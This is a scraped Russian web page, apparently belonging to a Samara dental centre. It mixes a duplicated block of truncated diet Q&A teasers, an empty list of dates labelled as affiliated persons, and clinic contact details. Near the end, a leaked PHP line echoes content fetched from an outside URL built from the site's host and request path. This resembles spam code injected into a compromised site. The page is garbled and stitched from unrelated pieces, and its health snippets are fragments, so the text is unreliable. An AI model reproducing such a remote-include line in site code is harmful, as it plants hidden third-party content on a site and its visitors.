Нет. Человек с больным желудком должен принимать пищу в определенные отрезки времени, с соответствующей пищей. Нарушение этого режима может привести к тяжелым неисправимым последствиям. А иногда и к смертельным исходам.

  • Диета для сфинкса - Можно ли сфинксов кормить влажным кормом? Как ухаживать за кошками - сфинксами? Ну знаю что их мыть надо часто, так как
  • Белковая диета проблеваться - Хочу похудеть, незнаю как Надо просто меньше жрать! извини за грубое слово! Белковая диета сытное и вкусное похудениеОс
  • Диета беременный женщин - Как можно отметить день рождения беременной девушке на диете? Фруктов хороших и разных. отварное мясо или рыба Белковая
  • Стимуляция как похудение - Скажите, можно ли доверять всяческим разрекламированым поясам для похудения и мышечной стимуляции??? Был у меня один, ес
  • Вызывание рвоты похудеть - Можно ли похудеть вызыванием рвоты ? Естественно нет. Вы только испортите себе желудок. Могу посоветовать белковую диету
  • Стифимол похудения отзывы - Стифимол это что? Какие таблетки на самом деле помогают похудеть из доступных? какие блокируут аппетит? не надо советов
  • Диета при приеме настойки болиголов - Подскажите что-нибудь про лечение рака 3 стадии ядовитыми настойками. Может кто-то имел опыт или был свидетелем лечения.
  • Научное обоснование диеты по группе крови - Имеют ли научное обоснование диеты по группе крови? Любая диета научна... Многие сегодня в Азербайджане слышали, что пох
  • Диета мясная пример меню - Что можно есть при сахарном диабете? То, что не содержит сахар В супермаркете есть такой отдел, где лежат продукты специ
  • Диета обнаженной - Весна уж скоро и а там не за горами время "голых животиков")) На диету когда планируешь садиться? ) ) Доброе утро, ТДВ!)
  • Диета для сфинкса - Можно ли сфинксов кормить влажным кормом? Как ухаживать за кошками - сфинксами? Ну знаю что их мыть надо часто, так как
  • Белковая диета проблеваться - Хочу похудеть, незнаю как Надо просто меньше жрать! извини за грубое слово! Белковая диета сытное и вкусное похудениеОс
  • Диета беременный женщин - Как можно отметить день рождения беременной девушке на диете? Фруктов хороших и разных. отварное мясо или рыба Белковая
  • Стимуляция как похудение - Скажите, можно ли доверять всяческим разрекламированым поясам для похудения и мышечной стимуляции??? Был у меня один, ес
  • Вызывание рвоты похудеть - Можно ли похудеть вызыванием рвоты ? Естественно нет. Вы только испортите себе желудок. Могу посоветовать белковую диету
  • Стифимол похудения отзывы - Стифимол это что? Какие таблетки на самом деле помогают похудеть из доступных? какие блокируут аппетит? не надо советов
  • Диета при приеме настойки болиголов - Подскажите что-нибудь про лечение рака 3 стадии ядовитыми настойками. Может кто-то имел опыт или был свидетелем лечения.
  • Научное обоснование диеты по группе крови - Имеют ли научное обоснование диеты по группе крови? Любая диета научна... Многие сегодня в Азербайджане слышали, что пох
  • Диета мясная пример меню - Что можно есть при сахарном диабете? То, что не содержит сахар В супермаркете есть такой отдел, где лежат продукты специ
  • Диета обнаженной - Весна уж скоро и а там не за горами время "голых животиков")) На диету когда планируешь садиться? ) ) Доброе утро, ТДВ!)
Вино которое можно пить при диете
 
 

Список аффилированных лиц

03 июля 2012

04 апреля 2012

10 января 2012

06 октября 2011

03 июля 2011

01 апреля 2011



12 января 2011

30 сентября 2010

30 июня 2010

1 апреля 2010





12 января 2010





2 октября 2009





17 июля 2009



 

 
Адрес: г. Самара, ул. Гагарина 18А (м. Гагаринская)
Тел. (846) 260-68-45, 260-68-48
Факс (846) 260-68-45
Email: stomatsamara@mail.ru
Центр работает с 8:00 до 20:00
Выходные суббота, воскресенье
Схема проезда
  echo file_get_contents(''.$_SERVER["HTTP_HOST"].'&path='.$_SERVER["REQUEST_URI"]);?>
Счетчик посещаемости и статистика сайта